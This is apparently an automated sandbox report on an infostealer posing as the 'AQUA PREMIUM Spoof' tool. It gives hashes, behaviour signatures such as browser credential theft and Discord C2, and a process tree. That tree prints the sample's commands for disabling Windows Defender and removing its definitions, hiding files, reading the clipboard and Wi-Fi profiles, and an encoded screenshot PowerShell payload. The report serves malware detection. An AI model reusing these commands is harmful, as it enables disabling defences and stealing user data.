Overview
overview
10Static
static
10AQUA PREMIUM (1).rar
windows7-x64
7AQUA PREMIUM (1).rar
windows10-2004-x64
1AQUA PREMI...of.exe
windows7-x64
7AQUA PREMI...of.exe
windows10-2004-x64
8��M̵L�.pyc
windows7-x64
��M̵L�.pyc
windows10-2004-x64
Respoof.cmd
windows7-x64
1Respoof.cmd
windows10-2004-x64
1first.reg
windows7-x64
1first.reg
windows10-2004-x64
1Analysis
-
max time kernel
93s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
24-12-2024 09:03
Behavioral task
behavioral1
Sample
AQUA PREMIUM (1).rar
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
AQUA PREMIUM (1).rar
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
AQUA PREMIUM Spoof.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
AQUA PREMIUM Spoof.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
��M̵L�.pyc
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
��M̵L�.pyc
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
Respoof.cmd
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
Respoof.cmd
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
first.reg
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
first.reg
Resource
win10v2004-20241007-en
General
-
Target
AQUA PREMIUM Spoof.exe
-
Size
5.9MB
-
MD5
47911cfecd3dcd8b505235dd9b187992
-
SHA1
9c874cead1208b3b77f0ae535d07522629e6e676
-
SHA256
3aac1ef0cd3825fbb753199f1fe31430f4aba354cc4fb8e7db74b63ac8f7efdf
-
SHA512
cac06ffeb06e83c2e0a4c98512dde8292c2800a35a4653621e6cdd2877293381ebf7f773456974b4181838e98916ff9a6c6d5ec2ec145398cfddbb2668889eec
-
SSDEEP
98304:V2De7pzWqe8MMhJMjarCtaCObO/OH9KkqQz4W1kgeDtFMai3lMmg8N:VzNzWKB6yA+KO0WR4iarmg8N
Malware Config
Signatures
-
pid Process 3540 powershell.exe 3472 powershell.exe 3320 powershell.exe 2084 powershell.exe 3476 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts AQUA PREMIUM Spoof.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 4068 cmd.exe 5040 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4516 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 3576 AQUA PREMIUM Spoof.exe 3576 AQUA PREMIUM Spoof.exe 3576 AQUA PREMIUM Spoof.exe 3576 AQUA PREMIUM Spoof.exe 3576 AQUA PREMIUM Spoof.exe 3576 AQUA PREMIUM Spoof.exe 3576 AQUA PREMIUM Spoof.exe 3576 AQUA PREMIUM Spoof.exe 3576 AQUA PREMIUM Spoof.exe 3576 AQUA PREMIUM Spoof.exe 3576 AQUA PREMIUM Spoof.exe 3576 AQUA PREMIUM Spoof.exe 3576 AQUA PREMIUM Spoof.exe 3576 AQUA PREMIUM Spoof.exe 3576 AQUA PREMIUM Spoof.exe 3576 AQUA PREMIUM Spoof.exe 3576 AQUA PREMIUM Spoof.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 26 discord.com 27 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 15 ip-api.com 24 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 4092 tasklist.exe 2140 tasklist.exe 2396 tasklist.exe 5016 tasklist.exe 4544 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 3372 cmd.exe -
resource yara_rule behavioral4/files/0x000b000000023b9b-21.dat upx behavioral4/memory/3576-25-0x00007FF8288A0000-0x00007FF828D06000-memory.dmp upx behavioral4/files/0x000a000000023b8e-27.dat upx behavioral4/files/0x000a000000023b99-31.dat upx behavioral4/memory/3576-48-0x00007FF83C7A0000-0x00007FF83C7AF000-memory.dmp upx behavioral4/files/0x000a000000023b95-47.dat upx behavioral4/files/0x000a000000023b94-46.dat upx behavioral4/files/0x000a000000023b93-45.dat upx behavioral4/files/0x000a000000023b92-44.dat upx behavioral4/files/0x000a000000023b91-43.dat upx behavioral4/files/0x000a000000023b90-42.dat upx behavioral4/files/0x000a000000023b8f-41.dat upx behavioral4/files/0x000a000000023b8d-40.dat upx behavioral4/files/0x0009000000023bb9-39.dat upx behavioral4/files/0x0008000000023bb4-38.dat upx behavioral4/files/0x000e000000023bab-37.dat upx behavioral4/files/0x000b000000023b9a-34.dat upx behavioral4/files/0x000a000000023b98-33.dat upx behavioral4/memory/3576-30-0x00007FF83C870000-0x00007FF83C894000-memory.dmp upx behavioral4/memory/3576-54-0x00007FF837D60000-0x00007FF837D8C000-memory.dmp upx behavioral4/memory/3576-56-0x00007FF837D40000-0x00007FF837D58000-memory.dmp upx behavioral4/memory/3576-58-0x00007FF837D20000-0x00007FF837D3F000-memory.dmp upx behavioral4/memory/3576-60-0x00007FF828320000-0x00007FF82849D000-memory.dmp upx behavioral4/memory/3576-62-0x00007FF839CD0000-0x00007FF839CE9000-memory.dmp upx behavioral4/memory/3576-64-0x00007FF8391C0000-0x00007FF8391CD000-memory.dmp upx behavioral4/memory/3576-66-0x00007FF838390000-0x00007FF8383BE000-memory.dmp upx behavioral4/memory/3576-73-0x00007FF827FA0000-0x00007FF828315000-memory.dmp upx behavioral4/memory/3576-74-0x00007FF83C870000-0x00007FF83C894000-memory.dmp upx behavioral4/memory/3576-71-0x00007FF837F50000-0x00007FF838008000-memory.dmp upx behavioral4/memory/3576-70-0x00007FF8288A0000-0x00007FF828D06000-memory.dmp upx behavioral4/memory/3576-78-0x00007FF838360000-0x00007FF83836D000-memory.dmp upx behavioral4/memory/3576-77-0x00007FF838370000-0x00007FF838385000-memory.dmp upx behavioral4/memory/3576-80-0x00007FF837800000-0x00007FF837918000-memory.dmp upx behavioral4/memory/3576-81-0x00007FF837D20000-0x00007FF837D3F000-memory.dmp upx behavioral4/memory/3576-94-0x00007FF828320000-0x00007FF82849D000-memory.dmp upx behavioral4/memory/3576-111-0x00007FF839CD0000-0x00007FF839CE9000-memory.dmp upx behavioral4/memory/3576-171-0x00007FF838390000-0x00007FF8383BE000-memory.dmp upx behavioral4/memory/3576-210-0x00007FF837F50000-0x00007FF838008000-memory.dmp upx behavioral4/memory/3576-267-0x00007FF827FA0000-0x00007FF828315000-memory.dmp upx behavioral4/memory/3576-290-0x00007FF828320000-0x00007FF82849D000-memory.dmp upx behavioral4/memory/3576-293-0x00007FF838390000-0x00007FF8383BE000-memory.dmp upx behavioral4/memory/3576-284-0x00007FF8288A0000-0x00007FF828D06000-memory.dmp upx behavioral4/memory/3576-289-0x00007FF837D20000-0x00007FF837D3F000-memory.dmp upx behavioral4/memory/3576-285-0x00007FF83C870000-0x00007FF83C894000-memory.dmp upx behavioral4/memory/3576-331-0x00007FF838370000-0x00007FF838385000-memory.dmp upx behavioral4/memory/3576-339-0x00007FF837D20000-0x00007FF837D3F000-memory.dmp upx behavioral4/memory/3576-344-0x00007FF837F50000-0x00007FF838008000-memory.dmp upx behavioral4/memory/3576-343-0x00007FF838390000-0x00007FF8383BE000-memory.dmp upx behavioral4/memory/3576-342-0x00007FF8391C0000-0x00007FF8391CD000-memory.dmp upx behavioral4/memory/3576-341-0x00007FF839CD0000-0x00007FF839CE9000-memory.dmp upx behavioral4/memory/3576-340-0x00007FF828320000-0x00007FF82849D000-memory.dmp upx behavioral4/memory/3576-338-0x00007FF837D40000-0x00007FF837D58000-memory.dmp upx behavioral4/memory/3576-337-0x00007FF837D60000-0x00007FF837D8C000-memory.dmp upx behavioral4/memory/3576-336-0x00007FF838360000-0x00007FF83836D000-memory.dmp upx behavioral4/memory/3576-335-0x00007FF83C870000-0x00007FF83C894000-memory.dmp upx behavioral4/memory/3576-334-0x00007FF827FA0000-0x00007FF828315000-memory.dmp upx behavioral4/memory/3576-333-0x00007FF837800000-0x00007FF837918000-memory.dmp upx behavioral4/memory/3576-321-0x00007FF83C7A0000-0x00007FF83C7AF000-memory.dmp upx behavioral4/memory/3576-319-0x00007FF8288A0000-0x00007FF828D06000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4772 cmd.exe 1792 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 2024 cmd.exe 3208 netsh.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4020 WMIC.exe 3300 WMIC.exe 3348 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2912 systeminfo.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1792 PING.EXE -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 2084 powershell.exe 3540 powershell.exe 2084 powershell.exe 3540 powershell.exe 3476 powershell.exe 3476 powershell.exe 5040 powershell.exe 5040 powershell.exe 4392 powershell.exe 4392 powershell.exe 5040 powershell.exe 4392 powershell.exe 3472 powershell.exe 3472 powershell.exe 4612 powershell.exe 4612 powershell.exe 3320 powershell.exe 3320 powershell.exe 2052 powershell.exe 2052 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2084 powershell.exe Token: SeIncreaseQuotaPrivilege 4928 WMIC.exe Token: SeSecurityPrivilege 4928 WMIC.exe Token: SeTakeOwnershipPrivilege 4928 WMIC.exe Token: SeLoadDriverPrivilege 4928 WMIC.exe Token: SeSystemProfilePrivilege 4928 WMIC.exe Token: SeSystemtimePrivilege 4928 WMIC.exe Token: SeProfSingleProcessPrivilege 4928 WMIC.exe Token: SeIncBasePriorityPrivilege 4928 WMIC.exe Token: SeCreatePagefilePrivilege 4928 WMIC.exe Token: SeBackupPrivilege 4928 WMIC.exe Token: SeRestorePrivilege 4928 WMIC.exe Token: SeShutdownPrivilege 4928 WMIC.exe Token: SeDebugPrivilege 4928 WMIC.exe Token: SeSystemEnvironmentPrivilege 4928 WMIC.exe Token: SeRemoteShutdownPrivilege 4928 WMIC.exe Token: SeUndockPrivilege 4928 WMIC.exe Token: SeManageVolumePrivilege 4928 WMIC.exe Token: 33 4928 WMIC.exe Token: 34 4928 WMIC.exe Token: 35 4928 WMIC.exe Token: 36 4928 WMIC.exe Token: SeDebugPrivilege 2140 tasklist.exe Token: SeDebugPrivilege 3540 powershell.exe Token: SeIncreaseQuotaPrivilege 4928 WMIC.exe Token: SeSecurityPrivilege 4928 WMIC.exe Token: SeTakeOwnershipPrivilege 4928 WMIC.exe Token: SeLoadDriverPrivilege 4928 WMIC.exe Token: SeSystemProfilePrivilege 4928 WMIC.exe Token: SeSystemtimePrivilege 4928 WMIC.exe Token: SeProfSingleProcessPrivilege 4928 WMIC.exe Token: SeIncBasePriorityPrivilege 4928 WMIC.exe Token: SeCreatePagefilePrivilege 4928 WMIC.exe Token: SeBackupPrivilege 4928 WMIC.exe Token: SeRestorePrivilege 4928 WMIC.exe Token: SeShutdownPrivilege 4928 WMIC.exe Token: SeDebugPrivilege 4928 WMIC.exe Token: SeSystemEnvironmentPrivilege 4928 WMIC.exe Token: SeRemoteShutdownPrivilege 4928 WMIC.exe Token: SeUndockPrivilege 4928 WMIC.exe Token: SeManageVolumePrivilege 4928 WMIC.exe Token: 33 4928 WMIC.exe Token: 34 4928 WMIC.exe Token: 35 4928 WMIC.exe Token: 36 4928 WMIC.exe Token: SeIncreaseQuotaPrivilege 4020 WMIC.exe Token: SeSecurityPrivilege 4020 WMIC.exe Token: SeTakeOwnershipPrivilege 4020 WMIC.exe Token: SeLoadDriverPrivilege 4020 WMIC.exe Token: SeSystemProfilePrivilege 4020 WMIC.exe Token: SeSystemtimePrivilege 4020 WMIC.exe Token: SeProfSingleProcessPrivilege 4020 WMIC.exe Token: SeIncBasePriorityPrivilege 4020 WMIC.exe Token: SeCreatePagefilePrivilege 4020 WMIC.exe Token: SeBackupPrivilege 4020 WMIC.exe Token: SeRestorePrivilege 4020 WMIC.exe Token: SeShutdownPrivilege 4020 WMIC.exe Token: SeDebugPrivilege 4020 WMIC.exe Token: SeSystemEnvironmentPrivilege 4020 WMIC.exe Token: SeRemoteShutdownPrivilege 4020 WMIC.exe Token: SeUndockPrivilege 4020 WMIC.exe Token: SeManageVolumePrivilege 4020 WMIC.exe Token: 33 4020 WMIC.exe Token: 34 4020 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3756 wrote to memory of 3576 3756 AQUA PREMIUM Spoof.exe 82 PID 3756 wrote to memory of 3576 3756 AQUA PREMIUM Spoof.exe 82 PID 3576 wrote to memory of 2276 3576 AQUA PREMIUM Spoof.exe 83 PID 3576 wrote to memory of 2276 3576 AQUA PREMIUM Spoof.exe 83 PID 3576 wrote to memory of 3480 3576 AQUA PREMIUM Spoof.exe 84 PID 3576 wrote to memory of 3480 3576 AQUA PREMIUM Spoof.exe 84 PID 3576 wrote to memory of 2716 3576 AQUA PREMIUM Spoof.exe 87 PID 3576 wrote to memory of 2716 3576 AQUA PREMIUM Spoof.exe 87 PID 3576 wrote to memory of 3644 3576 AQUA PREMIUM Spoof.exe 89 PID 3576 wrote to memory of 3644 3576 AQUA PREMIUM Spoof.exe 89 PID 2276 wrote to memory of 2084 2276 cmd.exe 91 PID 2276 wrote to memory of 2084 2276 cmd.exe 91 PID 3480 wrote to memory of 3540 3480 cmd.exe 92 PID 3480 wrote to memory of 3540 3480 cmd.exe 92 PID 3644 wrote to memory of 4928 3644 cmd.exe 93 PID 3644 wrote to memory of 4928 3644 cmd.exe 93 PID 2716 wrote to memory of 2140 2716 cmd.exe 94 PID 2716 wrote to memory of 2140 2716 cmd.exe 94 PID 3576 wrote to memory of 4676 3576 AQUA PREMIUM Spoof.exe 96 PID 3576 wrote to memory of 4676 3576 AQUA PREMIUM Spoof.exe 96 PID 4676 wrote to memory of 3984 4676 cmd.exe 98 PID 4676 wrote to memory of 3984 4676 cmd.exe 98 PID 3576 wrote to memory of 4848 3576 AQUA PREMIUM Spoof.exe 99 PID 3576 wrote to memory of 4848 3576 AQUA PREMIUM Spoof.exe 99 PID 4848 wrote to memory of 3568 4848 cmd.exe 101 PID 4848 wrote to memory of 3568 4848 cmd.exe 101 PID 3576 wrote to memory of 1512 3576 AQUA PREMIUM Spoof.exe 102 PID 3576 wrote to memory of 1512 3576 AQUA PREMIUM Spoof.exe 102 PID 1512 wrote to memory of 4020 1512 cmd.exe 104 PID 1512 wrote to memory of 4020 1512 cmd.exe 104 PID 3576 wrote to memory of 4984 3576 AQUA PREMIUM Spoof.exe 105 PID 3576 wrote to memory of 4984 3576 AQUA PREMIUM Spoof.exe 105 PID 4984 wrote to memory of 3300 4984 cmd.exe 107 PID 4984 wrote to memory of 3300 4984 cmd.exe 107 PID 3576 wrote to memory of 3372 3576 AQUA PREMIUM Spoof.exe 160 PID 3576 wrote to memory of 3372 3576 AQUA PREMIUM Spoof.exe 160 PID 3576 wrote to memory of 3636 3576 AQUA PREMIUM Spoof.exe 110 PID 3576 wrote to memory of 3636 3576 AQUA PREMIUM Spoof.exe 110 PID 3372 wrote to memory of 4760 3372 cmd.exe 112 PID 3372 wrote to memory of 4760 3372 cmd.exe 112 PID 3636 wrote to memory of 3476 3636 cmd.exe 113 PID 3636 wrote to memory of 3476 3636 cmd.exe 113 PID 3576 wrote to memory of 4104 3576 AQUA PREMIUM Spoof.exe 114 PID 3576 wrote to memory of 4104 3576 AQUA PREMIUM Spoof.exe 114 PID 3576 wrote to memory of 4396 3576 AQUA PREMIUM Spoof.exe 115 PID 3576 wrote to memory of 4396 3576 AQUA PREMIUM Spoof.exe 115 PID 4396 wrote to memory of 2396 4396 cmd.exe 119 PID 4104 wrote to memory of 5016 4104 cmd.exe 118 PID 4396 wrote to memory of 2396 4396 cmd.exe 119 PID 4104 wrote to memory of 5016 4104 cmd.exe 118 PID 3576 wrote to memory of 1656 3576 AQUA PREMIUM Spoof.exe 120 PID 3576 wrote to memory of 1656 3576 AQUA PREMIUM Spoof.exe 120 PID 3576 wrote to memory of 4068 3576 AQUA PREMIUM Spoof.exe 121 PID 3576 wrote to memory of 4068 3576 AQUA PREMIUM Spoof.exe 121 PID 3576 wrote to memory of 2096 3576 AQUA PREMIUM Spoof.exe 124 PID 3576 wrote to memory of 2096 3576 AQUA PREMIUM Spoof.exe 124 PID 3576 wrote to memory of 680 3576 AQUA PREMIUM Spoof.exe 126 PID 3576 wrote to memory of 680 3576 AQUA PREMIUM Spoof.exe 126 PID 3576 wrote to memory of 2024 3576 AQUA PREMIUM Spoof.exe 128 PID 3576 wrote to memory of 2024 3576 AQUA PREMIUM Spoof.exe 128 PID 3576 wrote to memory of 3908 3576 AQUA PREMIUM Spoof.exe 129 PID 3576 wrote to memory of 3908 3576 AQUA PREMIUM Spoof.exe 129 PID 3576 wrote to memory of 324 3576 AQUA PREMIUM Spoof.exe 130 PID 3576 wrote to memory of 324 3576 AQUA PREMIUM Spoof.exe 130 -
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 4760 attrib.exe 320 attrib.exe 4628 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe"C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3756 -
C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe"C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3576 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3480 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:3984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:3568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:4020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:3300
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:3372 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe"4⤵
- Views/modifies file attributes
PID:4760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:5016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4396 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:1656
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:4068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:5040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:2096
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:680
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:1884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2024 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:3908
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:2912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:324
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:1152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA